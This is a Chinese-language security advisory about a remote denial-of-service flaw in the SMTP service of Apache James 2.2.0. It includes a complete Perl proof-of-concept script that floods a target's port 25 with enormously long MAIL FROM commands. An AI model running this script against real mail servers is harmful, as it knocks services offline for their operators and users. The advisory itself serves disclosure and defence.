Apache James SMTP远程拒绝服务漏洞
发布日期:2006-05-29
更新日期:2006-05-29
受影响系统:Apache Group James 2.2.0
描述:
BUGTRAQ ID:
18138
Apache James是纯Java的SMTP和POP3邮件服务器及NNTP新闻服务器。
James SMTP服务程序允许攻击者在SMTP命令参数(如MAIL)中向SMTP服务器提供超长数据,导致服务器的处理器负载不断增加直到100%,导致拒绝服务。
<*来源:Ahmad Muammar W.K (
y3dips@echo.or.id)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=114892208612276&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-------------------------- james.pl-----------------------------------------
#!/usr/bin/perl -w
use IO::Socket;
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";
if(@ARGV == 1)
{
my $host = $ARGV[0];
my $i = 1;
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)
or die " Cannot Connect to Server !";
while ( $i++ ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
close $socket;
}
else
{ print " Usage: $0 [target] \r\n\n"; }
---------------------------------------------------------------------------
建议:
厂商补丁:
Apache Group
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://httpd.apache.org/浏览次数:3146
严重程度:0(网友投票)